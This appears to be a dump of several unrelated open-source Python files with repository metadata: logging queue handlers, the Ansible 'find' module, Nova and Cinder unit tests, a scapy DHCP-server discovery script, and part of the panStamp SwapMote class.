self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, set the target to None and lose the buffer.
"""
self.flush()
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
gpl-3.0
|
cherusk/ansible
|
lib/ansible/modules/files/find.py
|
27
|
13494
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ruggero Marchei <[email protected]>
# (c) 2015, Brian Coca <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: find
author: Brian Coca (based on Ruggero Marchei's Tidy)
version_added: "2.0"
short_description: return a list of files based on specific criteria
requirements: []
description:
- Return a list of files based on specific criteria. Multiple criteria are AND'd together.
options:
age:
required: false
default: null
description:
- Select files whose age is equal to or greater than the specified time.
Use a negative age to find files equal to or less than the specified time.
You can choose seconds, minutes, hours, days, or weeks by specifying the
first letter of any of those words (e.g., "1w").
patterns:
required: false
default: '*'
description:
- One or more (shell or regex) patterns, which type is controlled by C(use_regex) option.
- The patterns restrict the list of files to be returned to those whose basenames match at
least one of the patterns specified. Multiple patterns can be specified using a list.
aliases: ['pattern']
contains:
required: false
default: null
description:
- One or more regex patterns which should be matched against the file content
paths:
required: true
aliases: [ "name", "path" ]
description:
- List of paths of directories to search. All paths must be fully qualified.
file_type:
required: false
description:
- Type of file to select
- The 'link' and 'any' choices were added in version 2.3
choices: [ "file", "directory", "link", "any" ]
default: "file"
recurse:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If target is a directory, recursively descend into the directory looking for files.
size:
required: false
default: null
description:
- Select files whose size is equal to or greater than the specified size.
Use a negative size to find files equal to or less than the specified size.
Unqualified values are in bytes, but b, k, m, g, and t can be appended to specify
bytes, kilobytes, megabytes, gigabytes, and terabytes, respectively.
Size is not evaluated for directories.
age_stamp:
required: false
default: "mtime"
choices: [ "atime", "mtime", "ctime" ]
description:
- Choose the file property against which we compare age. Default is mtime.
hidden:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to include hidden files, otherwise they'll be ignored.
follow:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to follow symlinks in path for systems with python 2.6+
get_checksum:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to retrieve a file's sha1 checksum
use_regex:
required: false
default: "False"
choices: [ True, False ]
description:
- If false the patterns are file globs (shell) if true they are python regexes
'''
EXAMPLES = r'''
# Recursively find /tmp files older than 2 days
- find:
paths: "/tmp"
age: "2d"
recurse: yes
# Recursively find /tmp files older than 4 weeks and equal or greater than 1 megabyte
- find:
paths: "/tmp"
age: "4w"
size: "1m"
recurse: yes
# Recursively find /var/tmp files with last access time greater than 3600 seconds
- find:
paths: "/var/tmp"
age: "3600"
age_stamp: atime
recurse: yes
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz
- find:
paths: "/var/tmp"
patterns: "*.old,*.log.gz"
size: "10m"
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz via regex
# Note that yaml double quotes require escaping backslashes but yaml single
# quotes do not.
- find:
paths: "/var/tmp"
patterns: "^.*?\\.(?:old|log\\.gz)$"
size: "10m"
use_regex: True
'''
RETURN = '''
files:
description: all matches found with the specified criteria (see stat module for full output of each dictionary)
returned: success
type: list of dictionaries
sample: [
{ path: "/var/tmp/test1",
mode: "0644",
"...": "...",
checksum: 16fac7be61a6e4591a33ef4b729c5c3302307523
},
{ path: "/var/tmp/test2",
"...": "..."
},
]
matched:
description: number of matches
returned: success
type: string
sample: 14
examined:
description: number of filesystem objects looked at
returned: success
type: string
sample: 34
'''
import os
import stat
import fnmatch
import time
import re
def pfilter(f, patterns=None, use_regex=False):
'''filter using glob patterns'''
if patterns is None:
return True
if use_regex:
for p in patterns:
r = re.compile(p)
if r.match(f):
return True
else:
for p in patterns:
if fnmatch.fnmatch(f, p):
return True
return False
def agefilter(st, now, age, timestamp):
'''filter files older than age'''
if age is None or \
(age >= 0 and now - st.__getattribute__("st_%s" % timestamp) >= abs(age)) or \
(age < 0 and now - st.__getattribute__("st_%s" % timestamp) <= abs(age)):
return True
return False
def sizefilter(st, size):
'''filter files greater than size'''
if size is None or \
(size >= 0 and st.st_size >= abs(size)) or \
(size < 0 and st.st_size <= abs(size)):
return True
return False
def contentfilter(fsname, pattern):
'''filter files which contain the given expression'''
if pattern is None:
return True
try:
f = open(fsname)
prog = re.compile(pattern)
for line in f:
if prog.match (line):
f.close()
return True
f.close()
except:
pass
return False
def statinfo(st):
return {
'mode' : "%04o" % stat.S_IMODE(st.st_mode),
'isdir' : stat.S_ISDIR(st.st_mode),
'ischr' : stat.S_ISCHR(st.st_mode),
'isblk' : stat.S_ISBLK(st.st_mode),
'isreg' : stat.S_ISREG(st.st_mode),
'isfifo' : stat.S_ISFIFO(st.st_mode),
'islnk' : stat.S_ISLNK(st.st_mode),
'issock' : stat.S_ISSOCK(st.st_mode),
'uid' : st.st_uid,
'gid' : st.st_gid,
'size' : st.st_size,
'inode' : st.st_ino,
'dev' : st.st_dev,
'nlink' : st.st_nlink,
'atime' : st.st_atime,
'mtime' : st.st_mtime,
'ctime' : st.st_ctime,
'wusr' : bool(st.st_mode & stat.S_IWUSR),
'rusr' : bool(st.st_mode & stat.S_IRUSR),
'xusr' : bool(st.st_mode & stat.S_IXUSR),
'wgrp' : bool(st.st_mode & stat.S_IWGRP),
'rgrp' : bool(st.st_mode & stat.S_IRGRP),
'xgrp' : bool(st.st_mode & stat.S_IXGRP),
'woth' : bool(st.st_mode & stat.S_IWOTH),
'roth' : bool(st.st_mode & stat.S_IROTH),
'xoth' : bool(st.st_mode & stat.S_IXOTH),
'isuid' : bool(st.st_mode & stat.S_ISUID),
'isgid' : bool(st.st_mode & stat.S_ISGID),
}
def main():
module = AnsibleModule(
argument_spec = dict(
paths = dict(required=True, aliases=['name','path'], type='list'),
patterns = dict(default=['*'], type='list', aliases=['pattern']),
contains = dict(default=None, type='str'),
file_type = dict(default="file", choices=['file', 'directory', 'link', 'any'], type='str'),
age = dict(default=None, type='str'),
age_stamp = dict(default="mtime", choices=['atime','mtime','ctime'], type='str'),
size = dict(default=None, type='str'),
recurse = dict(default='no', type='bool'),
hidden = dict(default="False", type='bool'),
follow = dict(default="False", type='bool'),
get_checksum = dict(default="False", type='bool'),
use_regex = dict(default="False", type='bool'),
),
supports_check_mode=True,
)
params = module.params
filelist = []
if params['age'] is None:
age = None
else:
# convert age to seconds:
m = re.match("^(-?\d+)(s|m|h|d|w)?$", params['age'].lower())
seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
if m:
age = int(m.group(1)) * seconds_per_unit.get(m.group(2), 1)
else:
module.fail_json(age=params['age'], msg="failed to process age")
if params['size'] is None:
size = None
else:
# convert size to bytes:
m = re.match("^(-?\d+)(b|k|m|g|t)?$", params['size'].lower())
bytes_per_unit = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3, "t": 1024**4}
if m:
size = int(m.group(1)) * bytes_per_unit.get(m.group(2), 1)
else:
module.fail_json(size=params['size'], msg="failed to process size")
now = time.time()
msg = ''
looked = 0
for npath in params['paths']:
npath = os.path.expanduser(os.path.expandvars(npath))
if os.path.isdir(npath):
''' ignore followlinks for python version < 2.6 '''
for root,dirs,files in (sys.version_info < (2,6,0) and os.walk(npath)) or \
os.walk( npath, followlinks=params['follow']):
looked = looked + len(files) + len(dirs)
for fsobj in (files + dirs):
fsname=os.path.normpath(os.path.join(root, fsobj))
if os.path.basename(fsname).startswith('.') and not params['hidden']:
continue
try:
st = os.lstat(fsname)
except:
msg+="%s was skipped as it does not seem to be a valid file or it cannot be accessed\n" % fsname
continue
r = {'path': fsname}
if params['file_type'] == 'any':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISDIR(st.st_mode) and params['file_type'] == 'directory':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISREG(st.st_mode) and params['file_type'] == 'file':
if pfilter(fsobj, params['patterns'], params['use_regex']) and \
agefilter(st, now, age, params['age_stamp']) and \
sizefilter(st, size) and \
contentfilter(fsname, params['contains']):
r.update(statinfo(st))
if params['get_checksum']:
r['checksum'] = module.sha1(fsname)
filelist.append(r)
elif stat.S_ISLNK(st.st_mode) and params['file_type'] == 'link':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
if not params['recurse']:
break
else:
msg+="%s was skipped as it does not seem to be a valid directory or it cannot be accessed\n" % npath
matched = len(filelist)
module.exit_json(files=filelist, changed=False, msg=msg, matched=matched, examined=looked)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
fnordahl/nova
|
nova/tests/unit/api/openstack/compute/test_server_usage.py
|
63
|
5369
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from nova import compute
from nova import db
from nova import exception
from nova import objects
from nova.objects import instance as instance_obj
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
UUID1 = '00000000-0000-0000-0000-000000000001'
UUID2 = '00000000-0000-0000-0000-000000000002'
UUID3 = '00000000-0000-0000-0000-000000000003'
DATE1 = datetime.datetime(year=2013, month=4, day=5, hour=12)
DATE2 = datetime.datetime(year=2013, month=4, day=5, hour=13)
DATE3 = datetime.datetime(year=2013, month=4, day=5, hour=14)
def fake_compute_get(*args, **kwargs):
inst = fakes.stub_instance(1, uuid=UUID3, launched_at=DATE1,
terminated_at=DATE2)
return fake_instance.fake_instance_obj(args[1], **inst)
def fake_compute_get_all(*args, **kwargs):
db_list = [
fakes.stub_instance(2, uuid=UUID1, launched_at=DATE2,
terminated_at=DATE3),
fakes.stub_instance(3, uuid=UUID2, launched_at=DATE1,
terminated_at=DATE3),
]
fields = instance_obj.INSTANCE_DEFAULT_FIELDS
return instance_obj._make_instance_list(args[1],
objects.InstanceList(),
db_list, fields)
class ServerUsageTestV21(test.TestCase):
content_type = 'application/json'
prefix = 'OS-SRV-USG:'
_prefix = "/v2/fake"
def setUp(self):
super(ServerUsageTestV21, self).setUp()
fakes.stub_out_nw_api(self.stubs)
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
self.stubs.Set(compute.api.API, 'get_all', fake_compute_get_all)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Server_usage'])
return_server = fakes.fake_instance_get()
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
def _make_request(self, url):
req = fakes.HTTPRequest.blank(url)
req.accept = self.content_type
res = req.get_response(self._get_app())
return res
def _get_app(self):
return fakes.wsgi_app_v21(init_only=('servers', 'os-server-usage'))
def _get_server(self, body):
return jsonutils.loads(body).get('server')
def _get_servers(self, body):
return jsonutils.loads(body).get('servers')
def assertServerUsage(self, server, launched_at, terminated_at):
resp_launched_at = timeutils.parse_isotime(
server.get('%slaunched_at' % self.prefix))
self.assertEqual(timeutils.normalize_time(resp_launched_at),
launched_at)
resp_terminated_at = timeutils.parse_isotime(
server.get('%sterminated_at' % self.prefix))
self.assertEqual(timeutils.normalize_time(resp_terminated_at),
terminated_at)
def test_show(self):
url = self._prefix + ('/servers/%s' % UUID3)
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
now = timeutils.utcnow()
timeutils.set_time_override(now)
self.assertServerUsage(self._get_server(res.body),
launched_at=DATE1,
terminated_at=DATE2)
def test_detail(self):
url = self._prefix + '/servers/detail'
res = self._make_request(url)
self.assertEqual(res.status_int, 200)
servers = self._get_servers(res.body)
self.assertServerUsage(servers[0],
launched_at=DATE2,
terminated_at=DATE3)
self.assertServerUsage(servers[1],
launched_at=DATE1,
terminated_at=DATE3)
def test_no_instance_passthrough_404(self):
def fake_compute_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(compute.api.API, 'get', fake_compute_get)
url = self._prefix + '/servers/70f6db34-de8d-4fbd-aafb-4065bdfa6115'
res = self._make_request(url)
self.assertEqual(res.status_int, 404)
class ServerUsageTestV20(ServerUsageTestV21):
def setUp(self):
super(ServerUsageTestV20, self).setUp()
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Server_usage'])
def _get_app(self):
return fakes.wsgi_app(init_only=('servers',))
|
apache-2.0
|
julianwang/cinder
|
cinder/tests/unit/db/test_qos_specs.py
|
6
|
9241
|
# Copyright (C) 2013 eBay Inc.
# Copyright (C) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for quality_of_service_specs table."""
import time
from oslo_log import log as logging
from cinder import context
from cinder import db
from cinder import exception
from cinder import test
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
def fake_qos_specs_get_by_name(context, name, session=None, inactive=False):
pass
class QualityOfServiceSpecsTableTestCase(test.TestCase):
"""Test case for QualityOfServiceSpecs model."""
def setUp(self):
super(QualityOfServiceSpecsTableTestCase, self).setUp()
self.ctxt = context.RequestContext(user_id='user_id',
project_id='project_id',
is_admin=True)
def _create_qos_specs(self, name, values=None):
"""Create a transfer object."""
if values:
specs = dict(name=name, qos_specs=values)
else:
specs = {'name': name,
'qos_specs': {
'consumer': 'back-end',
'key1': 'value1',
'key2': 'value2'}}
return db.qos_specs_create(self.ctxt, specs)['id']
def test_qos_specs_create(self):
# If there is qos specs with the same name exists,
# a QoSSpecsExists exception will be raised.
name = 'QoSSpecsCreationTest'
self._create_qos_specs(name)
self.assertRaises(exception.QoSSpecsExists,
db.qos_specs_create, self.ctxt, dict(name=name))
specs_id = self._create_qos_specs('NewName')
query_id = db.qos_specs_get_by_name(
self.ctxt, 'NewName')['id']
self.assertEqual(specs_id, query_id)
def test_qos_specs_get(self):
value = dict(consumer='front-end',
key1='foo', key2='bar')
specs_id = self._create_qos_specs('Name1', value)
fake_id = 'fake-UUID'
self.assertRaises(exception.QoSSpecsNotFound,
db.qos_specs_get, self.ctxt, fake_id)
specs = db.qos_specs_get(self.ctxt, specs_id)
expected = dict(name='Name1', id=specs_id, consumer='front-end')
del value['consumer']
expected.update(dict(specs=value))
self.assertDictMatch(specs, expected)
def test_qos_specs_get_all(self):
value1 = dict(consumer='front-end',
key1='v1', key2='v2')
value2 = dict(consumer='back-end',
key3='v3', key4='v4')
value3 = dict(consumer='back-end',
key5='v5', key6='v6')
spec_id1 = self._create_qos_specs('Name1', value1)
spec_id2 = self._create_qos_specs('Name2', value2)
spec_id3 = self._create_qos_specs('Name3', value3)
specs = db.qos_specs_get_all(self.ctxt)
self.assertEqual(len(specs), 3,
"Unexpected number of qos specs records")
expected1 = dict(name='Name1', id=spec_id1, consumer='front-end')
expected2 = dict(name='Name2', id=spec_id2, consumer='back-end')
expected3 = dict(name='Name3', id=spec_id3, consumer='back-end')
del value1['consumer']
del value2['consumer']
del value3['consumer']
expected1.update(dict(specs=value1))
expected2.update(dict(specs=value2))
expected3.update(dict(specs=value3))
self.assertIn(expected1, specs)
self.assertIn(expected2, specs)
self.assertIn(expected3, specs)
def test_qos_specs_get_by_name(self):
name = str(int(time.time()))
value = dict(consumer='front-end',
foo='Foo', bar='Bar')
specs_id = self._create_qos_specs(name, value)
specs = db.qos_specs_get_by_name(self.ctxt, name)
del value['consumer']
expected = {'name': name,
'id': specs_id,
'consumer': 'front-end',
'specs': value}
self.assertDictMatch(specs, expected)
def test_qos_specs_delete(self):
name = str(int(time.time()))
specs_id = self._create_qos_specs(name)
db.qos_specs_delete(self.ctxt, specs_id)
self.assertRaises(exception.QoSSpecsNotFound, db.qos_specs_get,
self.ctxt, specs_id)
def test_qos_specs_item_delete(self):
name = str(int(time.time()))
value = dict(consumer='front-end',
foo='Foo', bar='Bar')
specs_id = self._create_qos_specs(name, value)
del value['consumer']
del value['foo']
expected = {'name': name,
'id': specs_id,
'consumer': 'front-end',
'specs': value}
db.qos_specs_item_delete(self.ctxt, specs_id, 'foo')
specs = db.qos_specs_get_by_name(self.ctxt, name)
self.assertDictMatch(specs, expected)
def test_associate_type_with_qos(self):
self.assertRaises(exception.VolumeTypeNotFound,
db.volume_type_qos_associate,
self.ctxt, 'Fake-VOLID', 'Fake-QOSID')
type_id = volume_types.create(self.ctxt, 'TypeName')['id']
specs_id = self._create_qos_specs('FakeQos')
db.volume_type_qos_associate(self.ctxt, type_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 1)
self.assertEqual(res[0]['id'], type_id)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
def test_qos_associations_get(self):
self.assertRaises(exception.QoSSpecsNotFound,
db.qos_specs_associations_get,
self.ctxt, 'Fake-UUID')
type_id = volume_types.create(self.ctxt, 'TypeName')['id']
specs_id = self._create_qos_specs('FakeQos')
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 0)
db.volume_type_qos_associate(self.ctxt, type_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 1)
self.assertEqual(res[0]['id'], type_id)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
type0_id = volume_types.create(self.ctxt, 'Type0Name')['id']
db.volume_type_qos_associate(self.ctxt, type0_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 2)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
self.assertEqual(res[1]['qos_specs_id'], specs_id)
def test_qos_specs_disassociate(self):
type_id = volume_types.create(self.ctxt, 'TypeName')['id']
specs_id = self._create_qos_specs('FakeQos')
db.volume_type_qos_associate(self.ctxt, type_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(res[0]['id'], type_id)
self.assertEqual(res[0]['qos_specs_id'], specs_id)
db.qos_specs_disassociate(self.ctxt, specs_id, type_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 0)
res = db.volume_type_get(self.ctxt, type_id)
self.assertIsNone(res['qos_specs_id'])
def test_qos_specs_disassociate_all(self):
specs_id = self._create_qos_specs('FakeQos')
type1_id = volume_types.create(self.ctxt, 'Type1Name')['id']
type2_id = volume_types.create(self.ctxt, 'Type2Name')['id']
type3_id = volume_types.create(self.ctxt, 'Type3Name')['id']
db.volume_type_qos_associate(self.ctxt, type1_id, specs_id)
db.volume_type_qos_associate(self.ctxt, type2_id, specs_id)
db.volume_type_qos_associate(self.ctxt, type3_id, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 3)
db.qos_specs_disassociate_all(self.ctxt, specs_id)
res = db.qos_specs_associations_get(self.ctxt, specs_id)
self.assertEqual(len(res), 0)
def test_qos_specs_update(self):
name = 'FakeName'
specs_id = self._create_qos_specs(name)
value = dict(key2='new_value2', key3='value3')
self.assertRaises(exception.QoSSpecsNotFound, db.qos_specs_update,
self.ctxt, 'Fake-UUID', value)
db.qos_specs_update(self.ctxt, specs_id, value)
specs = db.qos_specs_get(self.ctxt, specs_id)
self.assertEqual(specs['specs']['key2'], 'new_value2')
self.assertEqual(specs['specs']['key3'], 'value3')
|
apache-2.0
|
rthallisey/clapper
|
dhcp-test/test-pacemaker-networks.py
|
2
|
1263
|
import sys
from scapy.all import *
import ipaddress
def find_dhcp_servers():
conf.checkIPaddr = False
fam, hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover = (Ether(dst="ff:ff:ff:ff:ff:ff") /
IP(src="0.0.0.0", dst="255.255.255.255") /
UDP(sport=68, dport=67) /
BOOTP(chaddr=hw) /
DHCP(options=[("message-type", "discover"), "end"]))
ans, unans = srp(dhcp_discover, multi=True, timeout=10)
return [(unicode(packet[1][IP].src), packet[1][Ether].src)
for packet in ans]
if __name__ == '__main__':
result = 0
pacemaker_networks = [ipaddress.ip_network(unicode(net))
for net in sys.argv[1:]]
print "Looking for DHCP servers:"
dhcp_servers = find_dhcp_servers()
if len(dhcp_servers) > 0:
print "\nFound DHCP servers:\n"
for i, (ip, mac) in enumerate(dhcp_servers):
print "%d. %s (mac: %s)" % (i + 1, ip, mac)
for network in pacemaker_networks:
if network.overlaps(ipaddress.ip_network(ip)):
print "\tOverlaps with network %s" % network
result = 1
else:
print "No DHCP servers found."
sys.exit(result)
|
apache-2.0
|
ekoeppen/panstamp-python
|
pyswap/src/swap/protocol/SwapMote.py
|
3
|
10123
|
#########################################################################
#
# SwapMote
#
# Copyright (c) 2011 panStamp <[email protected]>
#
# This file is part of the panStamp project.
#
# panStamp is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# panStamp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with panStamp; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301
# USA
#
# Author: Daniel Berenguer
# Creation date: 20-Aug-2011
#
#########################################################################
__author__="Daniel Berenguer"
__date__ ="$Aug 20, 2011 10:36:00 AM$"
#########################################################################
from SwapPacket import SwapStatusPacket, SwapCommandPacket, SwapQueryPacket
from SwapDefs import SwapRegId, SwapState
from SwapValue import SwapValue
from swap.SwapException import SwapException
from swap.xmltools.XmlDevice import XmlDevice
import time
class SwapMote(object):
"""
SWAP mote class
"""
def cmdRegister(self, regId, value):
"""
Send command to register and return expected response
@param regId: Register ID
@param value: New value
@return Expected SWAP status packet sent from mote after reception of this command
"""
# Expected response from mote
infPacket = SwapStatusPacket(self.address, regId, value)
# Command to be sent to the mote
cmdPacket = SwapCommandPacket(self.address, regId, value, self.nonce)
# Send command
cmdPacket.send(self.server)
# Return expected response
return infPacket;
def qryRegister(self, regId):
"""
Send query to register
@param regId: Register ID
"""
# Query packet to be sent
qryPacket = SwapQueryPacket(self.address, regId)
# Send query
qryPacket.send(self.server)
def staRegister(self, regId):
"""
Send SWAP status packet about the current value of the register passed as argument
@param regId: Register ID
@param value: New value
"""
# Get register
reg = self.getRegister(regId)
# Status packet to be sent
infPacket = SwapStatusPacket(self.address, regId, reg.value)
# Send SWAP status packet
infPacket.send(self.server)
def cmdRegisterWack(self, regId, value):
"""
Send SWAP command to remote register and wait for confirmation
@param regId: Register ID
@param value: New value
@return True if ACK is received from mote. Return False otherwise
"""
return self.server.setMoteRegister(self, regId, value)
def setAddress(self, address):
"""
Set mote address
@param address: New mote address
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(address, length=1)
return self.cmdRegisterWack(SwapRegId.ID_DEVICE_ADDR, val)
def setNetworkId(self, netId):
"""
Set mote's network id. Return true if ACK received from mote
@param netId: New Network ID
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(netId, length=2)
return self.cmdRegisterWack(SwapRegId.ID_NETWORK_ID, val)
def setFreqChannel(self, channel):
"""
Set mote's frequency channel. Return true if ACK received from mote
@param channel: New frequency channel
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(channel, length=1)
return self.cmdRegisterWack(SwapRegId.ID_FREQ_CHANNEL, val)
def setSecurity(self, secu):
"""
Set mote's security option. Return true if ACK received from mote
@param secu: Security option
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(secu, length=1)
return self.cmdRegisterWack(SwapRegId.ID_SECU_OPTION, val)
def setTxInterval(self, interval):
"""
Set periodic Tx interval. Return true if ACK received from mote
@param interval: New Tx interval
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(interval, length=2)
return self.cmdRegisterWack(SwapRegId.ID_TX_INTERVAL, val)
def restart(self):
"""
Ask mote to restart
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(SwapState.RESTART, length=1)
return self.cmdRegisterWack(SwapRegId.ID_SYSTEM_STATE, val)
def leaveSync(self):
"""
Ask mote to leave SYNC mode (RXON state)
@return True if this command is confirmed from the mote. Return False otherwise
"""
val = SwapValue(SwapState.RXOFF, length=1)
return self.cmdRegisterWack(SwapRegId.ID_SYSTEM_STATE, val)
def updateTimeStamp(self):
"""
Update time stamp
"""
self.timestamp = time.time()
def getRegister(self, regId):
"""
Get register given its ID
@param regId: Register ID
@return SwapRegister object
"""
# Regular registers
for reg in self.regular_registers:
if reg.id == regId:
return reg
# Configuration registers
for reg in self.config_registers:
if reg.id == regId:
return reg
return None
def getParameter(self, name):
"""
Get parameter given its name
@param name: name of the parameter belonging to this mote
@return: SwapParam object
"""
# Regular registers
for reg in self.regular_registers:
for param in reg.parameters:
if param.name == name:
return param
# Configuration registers
for reg in self.config_registers:
for param in reg.parameters:
if param.name == name:
return param
return None
def dumps(self, include_units=False):
"""
Serialize mote data to a JSON formatted string
@param include_units: if True, include list of units for each endpoint
within the serialized output
"""
data = {}
data["pcode"] = self.product_code
data["manufacturer"] = self.definition.manufacturer
